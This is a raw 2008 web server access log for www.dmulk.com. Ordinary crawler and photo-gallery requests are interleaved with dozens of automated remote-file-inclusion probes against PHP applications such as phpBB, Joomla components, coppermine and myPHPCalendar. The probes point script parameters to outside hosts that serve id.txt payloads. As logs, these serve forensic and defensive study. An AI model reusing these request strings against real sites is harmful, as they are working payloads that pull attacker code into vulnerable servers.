148.223.69.2 - - [23/Jul/2008:09:24:20 -0700] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.djplasma.ch/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.166.92 - - [23/Jul/2008:09:24:21 -0700] "GET /errors.php?error=http://gaara.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [23/Jul/2008:09:24:21 -0700] "GET /logs/access.log/errors.php?error=http://gaara.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [23/Jul/2008:09:24:21 -0700] "GET /logs/errors.php?error=http://gaara.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:24:29 -0700] "GET /logs/access_080329.log/modules/agendax/addevent.inc.php?agendax_path=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.27 - - [23/Jul/2008:09:24:31 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.27 - - [23/Jul/2008:09:24:35 -0700] "GET /?N=A&show=gallery&pageid=159&nggpage=2 HTTP/1.1" 200 36739 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.225.215.205 - - [23/Jul/2008:09:24:51 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://wearecanadians.com/ray/modules/global/install/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
66.225.215.205 - - [23/Jul/2008:09:24:51 -0700] "GET /lostpasswd.php?env[include_prefix]=http://wearecanadians.com/ray/modules/global/install/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
148.223.69.2 - - [23/Jul/2008:09:25:02 -0700] "GET /logs/access_080313.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.djplasma.ch/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:25:33 -0700] "GET /logs/access_080225.log/modules/agendax/addevent.inc.php?agendax_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:25:34 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:25:34 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:25:49 -0700] "GET /logs/access_080208.log/myPHPCalendar/admin.php?cal_dir=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:25:49 -0700] "GET /myPHPCalendar/admin.php?cal_dir=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:25:49 -0700] "GET /logs/myPHPCalendar/admin.php?cal_dir=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:25:54 -0700] "GET /logs/access_080223.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:25:58 -0700] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:25:58 -0700] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.246 - - [23/Jul/2008:09:26:04 -0700] "GET /bikes/dteel/2008_01_26/?D=A HTTP/1.0" 200 6600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:26:13 -0700] "GET /yabbse/Sources/Packages.php?sourcedir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.151.242 - - [23/Jul/2008:09:26:18 -0700] "GET /logs/access.log/errors.php?error=http://www.bvikrasnodar.ru/netcat_files/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.18.151.242 - - [23/Jul/2008:09:26:18 -0700] "GET /errors.php?error=http://www.bvikrasnodar.ru/netcat_files/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.2.100.138 - - [23/Jul/2008:09:26:19 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [23/Jul/2008:09:26:25 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:26:28 -0700] "GET /logs/access_080303.log/myPHPCalendar/admin.php?cal_dir=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:26:40 -0700] "GET /logs/access.log/errors.php?error=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:26:40 -0700] "GET /errors.php?error=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:26:41 -0700] "GET /logs/errors.php?error=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:26:43 -0700] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:26:43 -0700] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:45 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/Echo_Canyon_Panaroma_Medium.jpg HTTP/1.0" 200 30273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:45 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4651M.JPG HTTP/1.0" 200 138647 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:46 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4652M.JPG HTTP/1.0" 200 103419 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:46 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4654M.JPG HTTP/1.0" 200 131838 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:46 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4657M.JPG HTTP/1.0" 200 121427 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:46 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4660M.JPG HTTP/1.0" 200 142837 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:47 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4663M.JPG HTTP/1.0" 200 126298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:47 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4664M.JPG HTTP/1.0" 200 126781 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:47 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4667M.JPG HTTP/1.0" 200 119689 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:48 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4665M.JPG HTTP/1.0" 200 130998 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:48 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4668M.JPG HTTP/1.0" 200 134960 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:48 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4670M.JPG HTTP/1.0" 200 122145 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:49 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4671M.JPG HTTP/1.0" 200 118846 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:49 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4672M.JPG HTTP/1.0" 200 123861 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:49 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4673M.JPG HTTP/1.0" 200 125532 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:50 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4675M.JPG HTTP/1.0" 200 86827 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:51 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4669M.JPG HTTP/1.0" 200 124858 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:51 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4676M.JPG HTTP/1.0" 200 115904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:51 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4679M.JPG HTTP/1.0" 200 57653 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:51 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4681M.JPG HTTP/1.0" 200 62830 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:51 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4682M.JPG HTTP/1.0" 200 59743 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:52 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4683M.JPG HTTP/1.0" 200 80614 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:52 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4684M.JPG HTTP/1.0" 200 94266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:52 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4685M.JPG HTTP/1.0" 200 81747 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:52 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4686M.JPG HTTP/1.0" 200 100053 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:26:53 -0700] "GET /logs/access_080208.log/myPHPCalendar/admin.php?cal_dir=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:53 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4688M.JPG HTTP/1.0" 200 78444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:26:53 -0700] "GET /myPHPCalendar/admin.php?cal_dir=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:53 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4689M.JPG HTTP/1.0" 200 78460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:53 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4692M.JPG HTTP/1.0" 200 78427 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:26:53 -0700] "GET /logs/myPHPCalendar/admin.php?cal_dir=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:53 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4693M.JPG HTTP/1.0" 200 99160 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:54 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4695M.JPG HTTP/1.0" 200 87085 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:54 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4696M.JPG HTTP/1.0" 200 61863 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:54 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4698M.JPG HTTP/1.0" 200 86907 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:55 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4697M.JPG HTTP/1.0" 200 85038 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:55 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4700M.JPG HTTP/1.0" 200 101731 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:55 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4702M.JPG HTTP/1.0" 200 94109 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:56 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4703M.JPG HTTP/1.0" 200 100311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:56 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4705M.JPG HTTP/1.0" 200 115950 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:56 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4707M.JPG HTTP/1.0" 200 121121 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:57 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4710M.JPG HTTP/1.0" 200 62245 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:57 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4713M.JPG HTTP/1.0" 200 82178 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:57 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4721M.JPG HTTP/1.0" 200 88900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:58 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4722M.JPG HTTP/1.0" 200 92405 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:58 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4734M.JPG HTTP/1.0" 200 77428 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:58 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4739M.JPG HTTP/1.0" 200 88262 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:58 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4740M.JPG HTTP/1.0" 200 111069 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:59 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4741M.JPG HTTP/1.0" 200 111102 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:59 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4742M.JPG HTTP/1.0" 200 89285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:59 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4743M.JPG HTTP/1.0" 200 98831 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:26:59 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4744M.JPG HTTP/1.0" 200 83995 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:00 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4745M.JPG HTTP/1.0" 200 91057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:00 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4747M.JPG HTTP/1.0" 200 91381 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:00 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4749M.JPG HTTP/1.0" 200 123887 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:00 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4750M.JPG HTTP/1.0" 200 120517 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:02 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4751M.JPG HTTP/1.0" 200 81512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:02 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4752M.JPG HTTP/1.0" 200 92236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:02 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4753M.JPG HTTP/1.0" 200 63673 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:03 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/WeSTOC_2008_224M.JPG HTTP/1.0" 200 257717 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:03 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/WeSTOC_2008_249M.JPG HTTP/1.0" 200 192876 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
